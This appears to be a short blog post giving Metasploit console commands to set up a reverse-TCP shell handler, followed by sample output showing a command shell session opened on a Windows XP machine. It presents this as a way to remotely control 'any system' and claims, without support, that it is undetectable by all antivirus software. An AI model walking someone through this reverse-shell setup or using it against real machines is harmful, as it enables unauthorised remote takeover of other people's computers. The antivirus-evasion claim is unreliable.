Open Linux Shell prompt and type following commands:
# cd Desktop
# cd framework32
#./msfconsole
use exploit/multi/handler
> set payload windows/shell/reverse_tcp
> set LHOST 192.168.1.8
> set LPORT 4444
> set exitonsession TRUE
>exploit
Linux is ready to accept windows command prompt for remote control any system.
Advantage:
Fully undetectable for all anti virus’s.
POC:
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler…
[*] Command shell session 1 opened (192.168.1.139:4444 -> 192.168.1.8:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32
0 comments:
Post a Comment